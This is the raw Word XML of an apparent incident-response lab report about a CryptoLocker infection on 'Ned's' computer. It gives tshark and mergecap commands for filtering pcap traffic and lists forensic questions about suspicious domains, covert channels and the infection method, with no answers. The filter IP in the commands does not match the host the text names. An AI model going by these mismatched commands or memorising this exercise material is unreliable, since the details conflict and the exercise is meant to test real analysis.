    <w:p w14:paraId="1C195DE7" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Incident 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14341F1E" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="2E9A7E38" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>komputer Ned terinfeksi oleh cryptolocker malware. Karena tidak tahu pasti kapan waktunya maka kami harus mencari diseluruh file pcap yang ada, karna file cukup besar (4GB) maka kami filter untuk t</w:t>
      </w:r>
      <w:r>
        <w:t>raffic keluar masuk dari komputer Ned (192.168.0.53), kemudian menyatukannya menjadi satu file pcap, dengan cara</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E8E649" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="3CD76459" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt; mkdir alllogs nedtrafic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E317E7A" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt; find dailylogs -type f -exec mv {} alllogs \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCDE77C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt; cd alllogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65365FBA" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; for ii in *; do echo filterring $ii; tshark -2 -r $ii -R </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203610C" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>==217.195.49.146' -w ../nedtrafic/$ii; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AEFA94" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt; cd nedtrafic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CFC4EE" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; mergecap -w </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>all.pcap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC284AD" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="3368ACC1" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>ukurannya cukup besar yaitu 284MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B832AB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="227C99B2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2.1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> From which three “odd” (non-legitimate) domain names were the largest downloads made by Ned’s computer (192.168.0.53)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212117C2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="0D993C01" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Question 2.2: Are the files downloaded malicious?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9FB3A0" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="6BBAE2FB" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="7BA29990" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Question 2.3: List the potential HTML Vulnerable looking pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA162F" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="5A61E011" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="77DDC197" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Ques</w:t>
      </w:r>
      <w:r>
        <w:t>tion 2.4: List potentially Covert Channels identified in Ned’s Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158C0C2" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="14E7928B" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:p w14:paraId="12ED9D97" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00BF5476">
      <w:r>
        <w:t>Question 2.5: Identify the method of Infection into Ned’s Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C35B15" w14:textId="77777777" w:rsidR="00DB655D" w:rsidRDefault="00DB655D"/>
    <w:sectPr w:rsidR="00DB65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55D"/>
    <w:rsid w:val="00BF5476"/>
    <w:rsid w:val="00D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0F2"/>
  <w15:docId w15:val="{5DF10C75-8563-4CF0-9496-549B7A0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ID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pwned.se/skybl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pwned.se" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pwne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2569</Words>
  <Characters>14647</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>122</Lines>
  <Paragraphs>34</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Suryayusra Suryayusra</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-03T02:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-03T02:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>